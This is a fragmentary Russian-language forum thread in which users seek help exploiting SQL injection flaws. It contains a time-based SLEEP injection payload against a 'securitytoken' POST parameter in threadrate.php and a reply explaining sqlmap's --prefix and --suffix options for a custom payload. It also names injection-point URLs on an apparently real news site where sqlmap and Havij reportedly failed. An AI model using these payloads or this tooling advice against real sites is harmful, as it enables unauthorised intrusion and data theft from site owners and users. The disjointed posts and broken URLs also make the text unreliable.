Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&Sectio nID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search= %Inject_Here%
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru